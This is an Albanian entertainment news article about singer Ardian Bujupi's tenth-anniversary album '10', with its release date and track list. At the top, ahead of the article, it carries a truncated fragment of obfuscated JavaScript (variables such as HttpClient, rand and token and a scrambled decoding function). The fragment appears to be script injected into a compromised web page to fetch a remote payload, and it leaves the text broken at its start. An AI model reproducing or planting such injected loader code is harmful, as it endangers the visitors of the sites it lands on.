;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Zbulohen detaje të reja nga albumi i ri i Ardian Bujupit

By

Ardian Bujupi po shënon 10 vjetorin e karrierës së tij muzikore, me një album!

Por ky album nuk do të jetë si të kaluarit, sepse sipas tij ky përmbledh punën e tij më të mirë që ka bërë ndër vite.

Lajmin e dha vetë këngëtari me anë të një postimi në llogarinë e tij në Instagram, ku zbuloi edhe kopertinën e albumit që do të lansohet me 28 maj.

“Këtë vit do të publikojë projektin tim më të madh për 10-vjetorin e karrierës. Siç më njihni, diçka muzikore po vjen me cilësi të pakrahasueshme, vepra më e mirë e karrierës sime dhe këtë gjë nuk e kam pretenduar kurrë në 5 albumet e mi. “10” do të publikohet pak para verës, 28.05.2021 dhe përfshin 10 këngë që janë realizuar me shumë punë. Unë jam gati për verën, ju jeni gati për “10”?”, ka shkruar Bujupi.

View this post on Instagram

A post shared by Ardian (@ardianbujupi)

Përmes postimeve në rrjete sociale, Ardiani ka zbuluar titujt e 10 këngëve të albumit të ri, duke i shfaqur në mënyrë të veçantë në një ndërtesë.

“Rebela”, “Habibi” me Azzi Memo”, “Versace”, “Peligrosa”, “Warium” me Aylo, “Jump on it”, “Paname”, “Baila Morena”, “Ka je Bonita” dhe “10/10″ me Davide”; janë këngët e albumit të tij të ri. /prive.al

View this post on Instagram

A post shared by Ardian (@ardianbujupi)

Artikuj të ngjashëm